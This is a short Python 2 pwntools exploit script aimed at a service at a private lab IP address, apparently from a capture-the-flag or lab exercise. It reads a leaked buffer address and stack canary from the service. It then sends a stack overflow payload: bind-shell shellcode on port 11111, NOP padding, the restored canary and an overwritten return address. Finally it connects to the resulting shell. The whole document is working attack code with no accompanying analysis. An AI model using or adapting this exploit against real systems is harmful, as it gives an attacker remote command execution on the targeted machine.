#!/usr/bin/env python2
from pwn import *

p = remote('192.168.80.132', 31338)
buff = u32(p.recv(4))
canary = u32(p.recv(4))

log.info("Buffer: "+hex(buff))
log.info("Canary: "+hex(canary))

#Bind TCP Shellcode Port 11111
#http://shell-storm.org/shellcode/files/shellcode-836.php
shellcode = ''
shellcode += "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
shellcode += "\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68"
shellcode += "\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
shellcode += "\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd"
shellcode += "\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f"
shellcode += "\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
shellcode += "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
shellcode += "\x41\xcd\x80"

payload = ''
payload += shellcode #ebp-0x80c or esp+28
payload += '\x90'*(2048-len(shellcode)) #padding 2076-28
payload += p32(canary) #ebp-0xc or esp+2076
payload += 'N'*4 #ebp-0x8
payload += 'A'*4 #ebp-0x4
payload += 'I'*4 #ebp
payload += p32(buff) #esp+2092 Controlling eip overwriting return address (ret)
p.send(payload)

b = remote('192.168.80.132', 11111)
b.interactive()
